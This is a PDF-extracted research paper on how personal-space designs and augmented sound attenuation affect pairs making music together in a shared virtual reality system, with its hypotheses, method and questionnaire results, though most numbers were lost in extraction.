mailto:l.men@qmul.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. experience real-world interactions. for instance, the interactions based on keyboards and mouse for input and monitor for output have very different properties to real-world interactions (gaver, ). in contrast, virtual reality (vr) provides a novel space for multisensory experiences (turchet et al., ), and enables people to see, hear, and even interact with a virtual space naturally. it offers the potential for people to coordinate collaborative activities in a much more similar way to the real world, presenting people an opportunity to collaborate in virtual space in a more natural way in comparison to non-immersive digital media. whilst vr has become a hot topic and has been researched intensively, little attention has been paid to human-human interactions in shared virtual environments (sves), with even less being paid to addressing the creative and collaborative aspects of these interactions. 
we believe that having a better understanding of the role of space and territory within creative collaborations would provide a strong starting point, since real-world collaborations make use of space (raffestin, ) and the demarcation of personal and shared territory is a spatial strategy to affect, influence and control resources and access (sack, ). hence an effective arrangement and utilisation of a working space can possibly be a crucial factor to a successful collaboration in sves too. thus we are keen on designing and testing working space configurations to see if we can provide more fluid support to creative collaboration in sves. we will begin by reviewing related work in sves, space, territory, and territoriality. then the design of our sve system will be detailed and the study and results will be presented. finally, the overall study will be discussed and design implications will be given. related work shared virtual environments the term virtual environment (ve) can be traced back to the early s (bishop & fuchs, ), it emerged as a competing term to virtual reality; however, both are usually equally used to refer to a world created totally by computer simulation (luciani, ). in the mid- s, the development of network technology had made it feasible to link many users simultaneously in the same virtual environment, prompting the shared virtual environments (sves; schroeder, ). besides ‘‘sves’’, other terms used include multi-user virtual environments, multi-user virtual reality (carlsson & hagsand, ), collaborative virtual environments (cves; zhang & furnas ) and social virtual reality (svr). to align with mainstream usage, we will herein use the term sves to refer to ve systems in which users experience other participants as being mutually present in the same environment and in which they can interact inter-personally (cf. schroeder, ). sves can be seen as a convergence of research interests in vr and computing supported cooperative work (cscw; benford et al. ). whilst single-person ves may focus on creating a detailed (visual) simulation, the design of sves typically prioritises enabling collaboration between users (nassiri, powell & moore, ). by enabling multiple people to communicate and interact with each other and providing a natural medium for three-dimensional cscw (billinghurst et al., ), sves are considered emerging tools for a variety of purposes, including men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. toybox demo for oculus touch: https://www.youtube.com/watch?v= ifemiygma (accessed: - - ). a playstation vr demo: https://www. theverge.com/ / / / / playstation-virtual-reality-social-vr-demo (accessed: - - ). community activities (lea, honda & matsuda, ), online education (roussos et al., ), distributed work and training (nedel et al., ), and gaming and entertainment (see toybox and a playstation vr demo ) despite this, little research exist in the field of supporting collaborative creativity, leaving an open question: how should shared virtual environments be designed to support creative collaboration (cf. basdogan et al., ). space, territory, and territoriality sves constitute virtual spaces, although illusive they are meaningful (steuer, ). we believe gaining a better understanding of the virtual space is an effective way to answer the aforementioned question. 
‘‘space’’ is a material given prior to the happening of actions, and territory emerges as a result of the actions and a production of the actors (raffestin, ), helping people mediate their social interaction (altman, ), which is argued to be a key element to collaboration (kreijns, kirschner & jochems, ). additionally, people were found to perform creative collaboration in a similar way with the real world, they divided the working space and formed territory (men et al., ; men & bryan-kinns, ). thus, potentially, with more knowledge of the virtual space, we can even manipulate the virtual space to influence the collaboration in sves. note in this paper, the term ‘‘space’’ specifically refers to the physical virtual space rather than the space concept in psychology or social science, which falls out of the scope of this paper. personal and group space in collaboration a ‘‘personal space’’ herein refers to a specific space assigned to a specific person and ‘‘group space’’ refers to a specific space assigned to a specific group prior to the start of activities (e.g., an experiment). in cscws that focus on supporting collaborative creativity, providing personal space is argued to be useful (fencott & bryan-kinns, ; men & bryan-kinns, ), and integrating personal and group spaces, allowing users to work individually in their personal spaces at their own pace, cooperatively work together in the shared space, and smoothly transition between both is important (greenberg, boyle & laberge, ; sugimoto, hosoi & hashizume, ). as a starting point of this exploration, greenberg, boyle & laberge ( ) developed a pda-based prototype named sharednotes. they observed how users shifted between the two spaces and recommended against a rigid notion of ‘‘personal’’, instead they suggested the boundary between personal and public should be provided with gradations in subtle and lightweight ways, supporting a fluid transition between personal and public. following that, shen, everitt & ryall ( ) addressed this concern in their project ubitable by providing a flexible gradient of sharing semantics. specifically, rather than the binary notion of public and private space, ubitable provides an additional semi-private space, in which data is visible but not electronically accessible for others. however, both sets of research were carried out based on d media (pda and projector respectively), which made their findings less informative for vr. moreover, neither of these two explored more gradations between public space and personal space, i.e., the transition between the public space and personal space is step-less and smoother. in this study, we want to design virtual spatial configurations that provide a more gradual boundary between personal and public spaces and see if this can enable a fluid shift and provide better support for collaboration in vr. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.youtube.com/watch?v=ifemiygma https://www.youtube.com/watch?v=ifemiygma https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://www.theverge.com/ / / / /playstation-virtual-reality-social-vr-demo https://peerj.com http://dx.doi.org/ . /peerj-cs. 
territory and territoriality in collaboration (sves and tabletop) in a previous study, we found collaborators formed both personal and group territory during collaborative music making in an sve, and they also had territorial behaviour, e.g., most musical edits were done inside personal territories (men & bryan-kinns, ). by manipulating the virtual spatial configurations of an sve, the formation of territory and territorial behaviour can be influenced and, and as a result, the collaboration can be influenced (men & bryan-kinns, ). because there is limited research on territoriality in vr, and rich research on this in tabletop-based collaboration, we review territoriality in tabletop research as a supplement, which might be informative as it is also a computer- mediated collaboration that evolves territory. the term ‘‘tabletop’’ here refers to interactive tabletop displays, these usually include high quality projectors, flat panel or plasma displays, and touch-sensitive surfaces (kruger et al., ). these electronic tabletops inherit the collaborative benefits of tables, which greatly compensate computers’ disadvantages in this regard (scott, carpendale & inkpen, ). similarly, territoriality also plays an important role in the tabletop collaboration. collaborators were found to use different types of territory to serve different needs, including sharing, exchanging or storing working tools and resources (scott, carpendale & inkpen, ), though some researchers note that removing territorial constraints can promote exploratory group activity (xambó et al., ). two main types of territory have been identified from research on screen and tabletop mediated collaboration: ( ) personal territory for performing independent activities. when provided with a personal territory, users prefer to test their contribution before introducing it to the group work (fencott & bryan-kinns, ). this type of territory serves as a safe place to try and develop alternate ideas before publishing the ideas (tang, ). users have been found to prefer to rotate items toward themselves in the personal territory (tang, ) and perform very few actions in their collaborators’ personal territories (scott, carpendale & inkpen, ). ( ) group territory for performing the main task. in group territory, people create and develop new solutions, transfer resources and provide help (scott, carpendale & inkpen, ). it is interesting to note that the orientation properties of objects in the group territory can be used to convey support, to separate ideas or to group products (tang, ). in terms of designing for territoriality, scott, carpendale & inkpen ( ) proposed four guidelines for designing digital tabletop workspaces: (i) visibility of action; (ii) an appropriate size of workspace; (iii) providing functionality in the appropriate locality; (iv) allowing for the grouping of items to facilitate storage. furthermore, the visibility and transparency of actions have been found to be important in designing group workspaces, as they help collaborators to monitor each others’ actions, maintaining workspace awareness during collaboration (pinelle, gutwin & greenberg, ; fencott & bryan-kinns, ). however, this can result in overloaded cognitive information, which some people found to be difficult to handle (fencott & bryan-kinns, ). to date, little research has explored how such features of workspace might be designed for collaboration in sves. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
full source available at: https://sites.google. com/view/liangmen/projects/lemo experiment design creativity domain: why collaborative music making music making, as a collaborative activity that relies on shared goals, understanding and good interpersonal communication, has long been a key form of collaborative creativity (cf. bryan-kinns & hamilton, ; titon & slobin, ). its unique features make it an excellent activity through which to study collaborative activity. in , blaine & fels explored the design criteria of collaborative music-making (cmm) systems and pointed out key features including the media used, player interaction, the systems’ learning curves, physical interfaces and so on. in the same year, with inspiration from rodden’s ( ) classification space for collaborative software, otherwise known as groupware, barbosa ( ) developed the networked music systems classification space, which classifies cmm systems (cmms) in terms of the time dimension (synchronous/asynchronous) and space dimension (remote/co-located). for instance, daisyphone (bryan-kinns, ), which provides shared editing of short musical loops falls into the remote synchronous network music systems in this classification space. other examples include reactable (xambó et al., ) and billiart (bressan, vets & leman, ), both of which provide co-located music- making experience, and ocarina (wang, ), which provides a distributed experience. however, we should note that, despite decades of research into cmms and sves, relatively few sves that support cmm have been made. as a result, many basic but crucial questions in this field are waiting to be answered, e.g., how shared virtual environments should be designed to support creative collaboration, such as cmm. acoustic attenuation sound attenuates as a result of diminishing intensity when travelling through a medium. this feature of sounds enables humans to use their innate spatial abilities to retrieve and localise information and to aid performance (cf. billinghurst & kato ). whilst it is hard to adjust the acoustic attenuation of a real medium (e.g., the air) to enhance its potential, within vr, as the audio is simulated, we can simulate an augmented spatialised sound purposely. research has been done on investigating the impacts of spatialised sounds on user experience in vr, e.g., (hendrix & barfield, ). however, little research explores how the spatialisation of sound may affect or aid collaboration in sves (e.g., cmm). considering sound is both the primary medium and the final output of the creative task cmm (men & bryan-kinns, ), by affecting the audio, different settings of acoustic attenuation can possibly affect the collaboration differently. with the ability to modify the simulated acoustic attenuation in an immersive virtual environment, we can possibly create sonic privacy by augmenting acoustic attenuation, this privacy may then be used as personal space supporting individual creativity in cmm. lemo—an sve for collaborative music making we created let’s move (lemo ), which enables two users to manipulate virtual music interfaces together in an sve to create a -beat music loop, see fig. . lemo used in this study and men & bryan-kinns ( ) is an extensively modified version of the previous version (men & bryan-kinns, ). major differences include a new visual men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://sites.google.com/view/liangmen/projects/lemo https://sites.google.com/view/liangmen/projects/lemo https://peerj.com http://dx.doi.org/ . 
presentation of the interface, the ability to add, delete, and re-position music loops, with more freedom in terms of instruments, tempo, volume and pitch. these changes were made to improve the experience of music making and, more importantly, to enable users to re-position and share music loops, which is essential for this study. hereafter, ''lemo'' specifically refers to this modified version. (figure: participants a and b creating music together.) lemo was programmed in unity; models and textures were made in cinema d and photoshop respectively. the run-time environment includes two htc vive headsets (each with a leap motion mounted, see fig. c). the position and rotation of the headsets are tracked by two tracking cameras set around the scene, and hand gestures are tracked by the mounted leap motion. two pcs are used to run lemo; these are connected and synchronised via a lan cable. lemo has three key elements: ( ) music interface—lemo allows users to generate, remove, position and edit virtual music interfaces, which have two modes: sphere and matrix (fig. b). (figure: (a) the gesture to generate a new interface; (b) matrix (opened interface) and sphere (packed interface); double-click the pop button to switch between them (reproduced from men & bryan-kinns).) users can generate up to eight spheres with a pinch-and-stretch gesture, see fig. a. the music interface can be switched between the two modes, re-positioned or removed by manipulating the sphere or the pop button of the matrix with the corresponding gestures. as shown in fig. , the matrix interface contains a grid of × dots, with controllers at the bottom. each row represents the same pitch, forming an octave from bottom to top. users can edit notes by tapping dots. a vertical play-line repeatedly moves from left to right playing the corresponding notes. in this way, each interface generates a -note music loop. three controllers (tempo, volume and pitch) and two functional buttons (erase and switch) are located at the bottom of the matrix interface. ( ) avatars—each user has an avatar, including a head and both hands (fig. ). avatars are synchronised with users' real movements in real time, including the position and rotation of heads, as well as gestures. lemo provides visual aids for collaboration by synchronising the virtual environment (virtual space and music interfaces) and avatars across a network, providing participants with the sense of being in the same virtual environment and manipulating the same set of interfaces. ( ) a virtual space that includes a grey stage with a grid pattern (part of it is shown in fig. d). four types of spatial configurations were designed for this study, which will be detailed later. besides these three fundamental elements, lemo also has: spatialised audio (volume drops with distance) so that users can hear where the sounds originate; a voice notification system to facilitate the experiments, e.g., in the experimental scenario users will hear '' min left'' and ''end of session'' notifications; and a data-log system based on the trackers (htc vives and leap motion) to log time-stamped data from events generated by users' interactions and movements, including positions and rotations of heads, index fingers and thumbs, manipulation of the music interfaces (addition/deletion/re-positioning of musical interfaces, addition and deletion of music notes), and usage of personal space (activation/deactivation of personal spaces).
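lemo itself is implemented in unity; the sketch below is a simplified, non-unity python illustration of two of the mechanisms just described—the matrix step sequencer (rows as pitches of one octave, a play-line scanning the columns from left to right) and distance-based attenuation of a loop's volume. the grid size, pitch names, roll-off constant and all identifiers are our own illustrative choices, not values from the paper.

```python
import math

OCTAVE = ["C", "D", "E", "F", "G", "A", "B", "C'"]  # bottom row to top row

class MatrixLoop:
    def __init__(self, n_steps=16, position=(0.0, 0.0)):
        self.n_steps = n_steps
        self.position = position  # location of the loop on the virtual stage
        # grid[row][col] is True when the dot at that row/column is activated
        self.grid = [[False] * n_steps for _ in OCTAVE]

    def toggle(self, row, col):
        """Tapping a dot activates or deactivates a note."""
        self.grid[row][col] = not self.grid[row][col]

    def notes_at(self, step):
        """Pitches triggered when the play-line reaches a given column."""
        return [OCTAVE[r] for r, row in enumerate(self.grid) if row[step]]

def attenuated_volume(source_pos, listener_pos, base_volume=1.0, rolloff=1.0):
    """Volume drops with distance; a larger roll-off makes sounds fade sooner,
    which is one way to create a degree of sonic privacy."""
    d = math.dist(source_pos, listener_pos)
    return base_volume / (1.0 + rolloff * d)

# usage: one pass of the play-line over a loop, heard from 3 m away
loop = MatrixLoop()
loop.toggle(0, 0)   # a low C on the first beat
loop.toggle(4, 8)   # a G half-way through the loop
for step in range(loop.n_steps):
    if loop.notes_at(step):
        vol = attenuated_volume(loop.position, (3.0, 0.0))
        print(f"step {step:2d}: play {loop.notes_at(step)} at volume {vol:.2f}")
```

raising the roll-off parameter is the kind of manipulation referred to later as augmented attenuation, whereas a realistic setting keeps distant loops clearly audible.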
(figure: the matrix interface annotated with a c major scale, starting from c and finishing at c , and going back to c—each row corresponds to one note of the one-line octave, a vertical play-line checks the columns from left to right and plays the notes whose dots are activated, and the tempo, volume, pitch, erase, pop and switch controls sit at the bottom.)

hypotheses

research has suggested that users should be allowed to work individually in their personal spaces at their own pace, work together cooperatively in the shared space, and transition smoothly between the two spaces during collaboration (greenberg, boyle & laberge, ; shen, everitt & ryall, ; sugimoto, hosoi & hashizume, ). in a previous study (men & bryan-kinns, ), following this implication, we built three different spatial configurations (public space only, public space + publicly visible personal space, public space + publicly invisible personal space), and tested the different impacts of these spatial configurations on collaborative music making in an sve. the results showed adding personal space to be helpful in supporting collaborative music making in an sve, since it provided a chance to explore individual ideas, and provided higher efficiency. however, several negative impacts also showed up along with the addition of personal space, e.g., a longer average distance between participants, and reduced group territory and group edits (men & bryan-kinns, ). we believe this might be due to: (i) the separate, stationary locations of the personal spaces, which forced collaborators to move away from each other to access them, resulting in a longer distance between collaborators and less collaboration; and (ii) the rigid boundary between public space and personal space, which made users more isolated, resulting in a stronger sense of isolation. thus, we are keen to design new types of personal territory that eliminate these disadvantages and provide a more flexible, more fluid collaboration experience. to increase flexibility, we want to enable users to use personal space anywhere on the stage in the sve, and see how this flexibility might positively affect the collaboration; thus h was developed. to make the shift between personal and public spaces more fluid, inspired by the implication that the separation between public and personal workspace should be
additionally, the acoustic attenuation, rather than a personal space with rigid separation from public space, enables a gradual shift between personal and public workspace, which may possibly increase the fluidity of the experience and support collaboration better (cf. greenberg, boyle & laberge ). thus we developed h . below are the three hypotheses: h —personal space with mobility provides better support for collaboration than personal space with no mobility. h —attenuation can play a similar role to personal space with rigid form (cf. men & bryan-kinns ) in cmm in sve, providing collaborators with a personal space and supporting individual creativity during the collaboration. h —acoustic attenuation provides a fluid transition (no hard borders nor rigid forms) between personal and public spaces, which supports collaboration better compared to conditions with rigid borders. independent variable spatial configuration is the independent variable in this experiment. as shown in fig. , four space configurations were designed as the independent variable levels to investigate these three hypotheses, including: condition : public space only (referred to as cpub): where players can generate, remove or manipulate music interfaces, and have equal access to all of the space and the music interfaces. as no personal space is provided, a shift between public and personal space does not exist, and users cannot shift to personal space. condition : public space + augmented attenuation personal space (referred to as caug). in addition to cpub, the acoustic attenuation is augmented. the volume of audio drops much faster, creating a sonic privacy, which can be seen as a personal space. as the volume changes gradually with the changes in distance, the shift between personal space and public space is gradual. condition : public space + fixed personal space (referred to as cfix). in addition to cpub, each user is now provided with a personal space located at the corner of the stage (see fig. ), which works like a acoustically solid (soundproof) boundary between public space and personal space. in other words, the shift between personal space and public space is now rigid. each user has a handle to activate/deactivate the personal space, the handle appears automatically over their head when they look up. condition : public space + moveable personal space (referred to as cmov). every feature of this condition is the same as cfix, except now the personal space appears centring the user’s current head’s position when being triggered. men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure components of the virtual experiment scene. note: the rigidly soundproof personal space and the handle switch were only available in cfix & cmov (a); tilted view of the four experimental condi- tion settings (b, c, d, e). full-size doi: . /peerjcs. /fig- note: to make conditions more realistic and less artificial, the acoustic attenuation in cpub, cfix, cmov are set to mimic the real acoustic attenuation in the real world rather than no attenuation at all. dependent variables to identify how users use the space and the effect of adding personal space with different properties, a series of dependent variables were developed, which can be split into participant reports and activity assessment. participant reports questionnaires were used to collect participants’ subjective assessment of the conditions and their experience of the collaboration. 
the igroup presence questionnaire (ipq) was used to inform the design of questions about the sense of the collaborator’s presence (schubert, friedmann & regenbrecht, ). questions about output quality, communication, and contribution were adapted from the mutual engagement questionnaire (meq; bryan- kinns, ). the rest of the questions were designed to question people’s preference for conditions. the questionnaire included questions on: men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the queen mary research ethics committee granted ethical approval to carry out the study within its facilities (ethical application ref: qmrec ). ( ) presence: (i) sense of co-worker’s presence and (ii) sense of collaborator’s activities. note that the measure ‘‘sense of self-presence’’ is not included in this study, because a previous study (men & bryan-kinns, ) has shown lemo’s capability on producing a high-level of self-presence. ( ) communication: quality of communication, which may vary as the visibility of spaces can possibly affect the embodiment and nonverbal communication. ( ) content assessment: the satisfaction of the final music created reflects the quality of collaboration, cf. (bryan-kinns, ; bryan-kinns & hamilton, ). ( ) preference: preference of the conditions, checking if users have subjective preferences towards the settings. ( ) contribution: (i) the feeling of self’s contribution; (ii) the feeling of others’ contribution. these measures were set to see the effects of spatial configurations on the sense of contribution. these measures will be grouped into a post-session questionnaire (psq, see its items in table ), to be filled after participants experiencing each condition, and a comparison questionnaire (cq, see its items in table ), to be filled at the end of the experiment. activity assessments to access the characteristics of collaboration, we developed the following measures of activity in the collaboration based on the system-logged data: ( ) contribution: (i) number of musical note edits; (ii) number of note additions/dele- tions; (iii) number of mutual note modifications. here a mutual note modification indicate an edit on a certain note, the last update of which was performed by the collaborator, cf. (bryan-kinns, healey & leach, ). ( ) time and amount of use of personal space (only in condition cfix and caug, as this measure is based on the time-stamped entries of the rigid boundary of personal spaces): (i) number of uses of, (ii) length of time of using, and (iii) average duration of each use of personal space. ( ) location and territory: (i) distribution of participants’ locations and interactions; (ii) the sizes of personal/group territory; (iii) note edits fallen in different types of territory; (iv) average distance between participants, cf. colocation in (bryan-kinns, ). ( ) attention: (i) time participants spent paying close/ordinary attention to collaborator; (ii) number of times paying close/ordinary attention to the collaborator. strictly speaking, here ‘‘paying attention’’ means ‘‘facing toward the collaborator‘s avatar’’ as no eye tracker was involved in this study. participants and procedure fifty-two participants ( pairs) were recruited for this study via emails sent to group lists within the authors’ school. all participants were aged between and , with an average age of . (sd = . ). participants’ mean rating of personal musical theory knowledge is . (sd = . 
) on a -point likert scale, where higher values indicate increased knowledge. twenty four ( . %) played one or more instruments, and the remaining ( . %) did not. participants’ rating of experience of collaboratively composing music is . (sd = . ) on a -point likert scale, where higher values indicate men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of post-session questionnairea and results of wilcoxon rank sum test (two-tailed)b. questions cpub caug cfix cmov cpub vs caug cpub vs cfix cpub vs cmov caug vs cfix caug vs cmov cfix vs cmov m (sd) m (sd) m (sd) m (sd) p (w) p (w) p (w) p (w) p (w) p (w) psq (support for creativity)—i think the spatial configuration in this session was extremely helpful for creativity . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) . ( ) psq (support for creativity)—i feel like the spatial configuration in this session was extremely helpful to support the development of my own ideas . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) psq (preference)—i enjoyed the spatial configuration of this virtual world very much . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) psq (sense of collaborator’s presence)—i always had a strong feeling that my collaborator was there, collaborating with me together, all the time . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( ) . ( ) psq (content assessment)—how satisfied are you with the final piece of loop music you two created in this session . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) psq (communication quality)—how would you rate the quality of communication between you and your collaborator during the session . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( ) . ( ) psq (sense of collaborator’s activity)—i had a clear sense of what my collaborator was doing . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) psq (amount of contribution)—the amount of your contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( ) . ( . ) . ( ) . ( ) psq (amount of contribution)—the amount of your collaborator’s contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) . ( . ) . ( ) . ( . ) psq (quality of contribution)—what do you think of the quality of your contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( ) . ( . ) . ( ) . ( . ) psq (quality of contribution)—what do you think of the quality of your collaborator’s contribution to the joint piece of music is . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( ) . ( . ) notes. awith -point-likert scale, indicates no fulfilment at all with the description of the questionnaire and indicates a full fulfilment. bnote statistics in this table are calculated based on the data collected from the third and fourth session to counterbalance the learning effect. m en etal. ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of binomial test of comparison questionnaire (cq)a. question description option cpub caug cfix cmov k p k p k p k p cq (preference)—in which session, you enjoyed the spatial configuration the most? most enjoyed . . . . least enjoyed . . . . cq (content assessment)—in which session, you made the music you were most satisfied with? most satisfied . . . . 
least satisfied . . . . cq (coordination)—which session you found most difficult to track collaborator’s activities? most difficult . . . . least difficult . . . . cq (sense of collaborator’s presence)—which session did you have the strongest sense that your collaborator was there working with you together strongest . e− . . e− . least strongest . . . e− . cq (communication quality)—which session did you have the best quality of communication between your self and your collaborator best quality . . . . worst quality . . . . cq (preference)—which session had the best setting for creating a good piece of music collaboratively best setting . . . . worst setting . . . . cq (coordination)—which session did you find most difficult to cooperate with collaborator most difficult . . . . least difficult . . . . cq (contribution)—which session do you you feel you made the most contribution to the joint piece most contribution . . . . least contribution . . . . cq (contribution)—which session do you you feel your collaborator made the most contribution to the joint piece most contribution . . . . least contribution . . . . notes. alower-tailed test when k < , two-tailed test when k = , upper-tailed test when k > . increased experience. regarding familiarity with computers, ( . %) participants rated themselves as computer ‘‘experts’’, ( . %) chose ‘‘intermidiate’’, and only participant ( . %) chose ‘‘beginner’’. twenty participants ( . %) had tried vr – times before, ( . %) had only tried once, the remaining ( . %) had no vr experience before. thirty-seven participants knew their collaborators very well prior to the experiment, met their collaborators several times, but did not know well, the remaining did not know their collaborators at all prior to the experiment. the experimental hardware setup was exactly the same with lemo standard setup, see more details in the previous section ‘‘lemo—an sve for collaborative music making’’. after reading information forms and signing consent forms, each pair of participants first received an explanation of the music interface of lemo (see fig. ). then one men et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experimenter demonstrated all of the interaction gestures supported in lemo. by linking the demonstration with the first-person view shown on monitors, participants had a chance to learn how to play lemo. then, participants had a trial ( – min) to try all the ways of interaction. the trial ended once they were confident enough of all available gestures. the length of time of the tutorial session was flexible to ensure participants with diverse musical knowledge could grasp lemo. participants were then asked to have four sessions of collaboratively composing music that was mutually satisfying and complimented an animation loop, each session lasts min. based on our pilot study and a previous study (men & bryan-kinns, ), we found min was sufficient for the task. to counter-balance the learning effect, all four conditions were experienced in a fully randomised sequence to counterbalance the learning effect. in total four animation loops were introduced to trigger participants’ creativity, each to be played in one experimental session on four virtual screens surrounding the virtual stage. these clips were played in an independently randomised sequence to counterbalance impacts on the study. each session ended with a post-session questionnaire (psq, see table ). 
after all four sessions finished, the comparison questionnaire (cq, see table ) and a short interview were carried out at the end of the experiment.

results

participant reports

this section reports on the results of the questionnaires. ratings of the post-session questionnaire were refined to counterbalance the learning effect and then analysed with wilcoxon rank sum tests (table ). binomial tests were run to see if the number of ratings for each option was significantly different from what would be expected by chance; upper-tailed, lower-tailed or two-tailed tests were used accordingly, and the results are listed in table . (an illustrative sketch of these two tests is given at the end of the next subsection.) next, we will present how we counterbalanced the learning effect on the psq, and then the results will be reported following the sub-types of measures.

counterbalancing the learning effect

as aforementioned, we introduced a fully randomised order of experimental conditions to counterbalance the learning effect. however, it turned out that many measurements in the post-session questionnaire were still affected by the sequence to a certain extent, as shown in fig. , in which data from all groups were compiled according to how the group was ordered in the session sequence. wilcoxon rank sum tests were run between every two conditions for every question. a red solid arc indicates a significant difference between two bars (p < . ), and a grey dotted arc indicates a trend toward a significant difference (p < . ). the arcs show that the results of several questions (especially psq , psq , psq , psq , psq , psq ) are very sensitive to the sequential position of the session. specifically, in later sessions, participants responded more positively to the helpfulness of the spatial configuration (psq ), reported higher satisfaction with their output (psq ), and reported both more, and better quality of, contributions by themselves and their collaborators (psq , psq , psq , psq ). this is probably due to the learning effect, which has a much stronger effect on these measures than the differences between the experimental conditions. (figure: results of post-session questionnaire (n = ) for all sessions, grouped by session order; arcs show significant (solid line) and marginally significant (dotted line) differences between conditions, indicating possible ordering effects.) given the limited experience some participants had in vr and collaborative music making, the learning effect could have greatly promoted participants' skills and knowledge in performing the task, resulting in a better feeling towards the spatial configuration of the session, higher quality of output, and more contribution with better quality in later sessions.
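the following is a minimal sketch of the two kinds of tests mentioned above: a wilcoxon rank-sum test comparing psq ratings between two conditions, and a directional binomial test for a cq item. the rating vectors and counts are made-up placeholders, and the assumption of a 1/4 chance level for choosing one of four sessions is ours; this is not the authors' analysis code.

```python
from scipy.stats import ranksums, binomtest

# Wilcoxon rank-sum test comparing one PSQ item between two conditions
# (in the study, only ratings from the later two sessions would be used).
ratings_caug = [6, 5, 7, 6, 5, 6]   # placeholder ratings
ratings_cfix = [4, 5, 3, 4, 5, 4]
stat, p = ranksums(ratings_caug, ratings_cfix)
print(f"rank-sum statistic = {stat:.2f}, p = {p:.3f}")

# Binomial test for a CQ item: did significantly many (or few) of the n
# respondents pick this condition, assuming a chance level of 1/4 with four
# conditions? Upper-, lower- or two-tailed depending on the direction.
k, n, chance = 30, 52, 0.25          # placeholder counts
alternative = "greater" if k > n * chance else ("less" if k < n * chance else "two-sided")
result = binomtest(k, n, p=chance, alternative=alternative)
print(f"binomial test ({alternative}): p = {result.pvalue:.4f}")
```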
this learning effect was also mentioned by some participants in the interviews; more details will be discussed in the later subsection ''interviews''. to better counterbalance the learning effect and habituation on the psq, only data collected via the psq in the later two sessions (sessions and ) were retained, at the expense of a halved sample size. box-plots were then drawn (fig. ) and wilcoxon rank sum tests were run (table ) to compare the conditions against each other.

general feeling (helpfulness of spatial configuration, difficulty of cooperation)

when asked about the condition's helpfulness for creativity (psq in table ), on a -point likert scale, participants gave an average rating of . in caug, which is significantly higher than the . given in cfix (wilcoxon rank sum test, w = , p = . ). there are trends towards significance between participants' ratings of caug and cmov (w = , p = . ), and between cpub and cfix (w = . , p = . ). these differences indicate that caug is better than cfix, and possibly also better than cmov, in terms of supporting participants' creativity. when asked to rate the helpfulness of the spatial configurations for supporting personal idea development (psq ), the mean rating of caug (m = . ) is higher than that of the other three conditions (cpub: m = . ; cfix: m = . ; cmov: m = . ), though no significant differences were found. cq of table shows that cpub was rated by significantly many participants ( out of ) as the least difficult condition in which to cooperate with their collaborator (binomial test, . > . , p = . , -sided), whilst significantly few participants rated cpub as the most difficult one (binomial test, . < . , p = . , -sided). conversely, cfix was rated by significantly many participants as the most difficult (binomial test, . > . , p = . , -sided), and significantly few participants ( out of ) rated it as the least difficult (binomial test, . < . , p = . , -sided).

preference

when asked about the level of enjoyment of the spatial configuration (psq ), similar to psq , caug got a higher rating (m = . ); however, no significant difference was revealed. in cq of table , when asked which session had the most enjoyable spatial configuration, out of participants, both caug and cmov were chosen by participants, more than those choosing cpub and cfix ( participants each), though no significant difference was found. when asked which session had the least enjoyable spatial configuration, a significant number of participants ( out of ) chose cfix ( . > . , p = . , -sided), and significantly few ( out of ) chose cmov ( . < . , p = . , -sided). the result of cq in table indicates that significantly many participants ( out of ) believed cfix was the worst setting for creating a good piece of music collaboratively. to summarise, the spatial configuration of cfix was more disfavoured and that of cmov less disfavoured.

sense of co-presence

results of psq , psq and cq reveal participants' sense of their collaborator's presence and activities. cfix's ratings in psq and psq are significantly lower than those of cpub and
caug (wilcoxon rank sum test, all p < . ), indicating that cfix saw a lower sense of the collaborator's presence and activities. (figure: results of post-session questionnaire (n = ), data grouped by experimental conditions; only data collected in the latter two sessions are included; solid arcs show significant differences and dotted arcs show marginally significant differences between conditions.) similarly, when asked in which session they had the strongest sense of their collaborator (cq ), significantly many participants ( ) chose cpub ( . > . , p = . e− , -sided), chose caug, and significantly few chose cmov
conversely, significantly few had the worst communication quality in cpub and significantly many had the worst in cfix (binomial test, both p < . , see cq of table ). in summary, cfix saw a relatively lower communication quality.

contribution
